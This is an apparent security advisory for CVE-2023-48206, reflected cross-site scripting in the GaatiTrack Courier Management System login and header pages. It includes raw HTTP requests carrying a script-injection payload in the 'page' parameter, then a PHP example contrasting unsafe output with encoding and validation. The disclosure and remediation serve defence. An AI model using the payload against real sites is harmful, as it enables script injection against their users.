GaatiTrack Courier Management System 1.0 Cross Site Scripting
GaatiTrack Courier Management System version 1.0 suffers from multiple cross site scripting vulnerabilities.
# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting
# Date: 12/11/2023
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)
# Vendor Homepage: https://www.mayurik.com/
# Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php
# Version: v1.0
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48206

Description:
Multiple reflected cross-site scripting (XSS) vulnerabilities exist in the login.php and header.php pages of GaatiTrack Courier Management System v1.0. They allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website login page parameter.

Steps to Reproduce:

1. Go to login and capture the request data using Burp Suite. Your request data will be:

GET /gaatitrack/login.php HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

2. Now use the XSS payload in login.php. Your request data will be:

GET /gaatitrack/login.php?page=1</title><script>alert(document.domain)</script> HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp
Upgrade-Insecure-Requests: 1

3. Forward your request data and check the browser. A popup showing the domain will appear.

## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)
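
The leading `1</title>` in the advisory's request value indicates that `page` is reflected inside the document's `<title>` element. The PHP below is an added example, not GaatiTrack's source code (which the advisory does not show): it contrasts that reflection pattern with output encoding and input validation. The function names, the title text and the assumption that `page` is a positive integer are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical reconstruction, not GaatiTrack's actual code.

// Vulnerable pattern: the request value is concatenated into <title> as-is,
// so "</title>" in the value closes the element and the rest is parsed as HTML.
function render_title_unsafe(string $page): string
{
    return '<title>Login - page ' . $page . '</title>';
}

// Hardened: encode at the point of output. <, >, &, " and ' become entities,
// so the value can no longer terminate <title> or open a new tag.
function render_title_safe(string $page): string
{
    $encoded = htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<title>Login - page ' . $encoded . '</title>';
}

// Assumption: "page" is meant to be a positive integer. Validating it first
// rejects anything else (arrays, missing values, markup) and falls back to 1.
function page_number(mixed $raw): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? 1 : $n;
}

// Value taken from the advisory's second request.
$fromAdvisory = '1</title><script>alert(document.domain)</script>';

echo "unsafe:    ", render_title_unsafe($fromAdvisory), PHP_EOL;
echo "encoded:   ", render_title_safe($fromAdvisory), PHP_EOL;
echo "validated: ", render_title_safe((string) page_number($fromAdvisory)), PHP_EOL;
```

Encoding has to be applied at every place the value is written into HTML; the advisory names both login.php and header.php as affected.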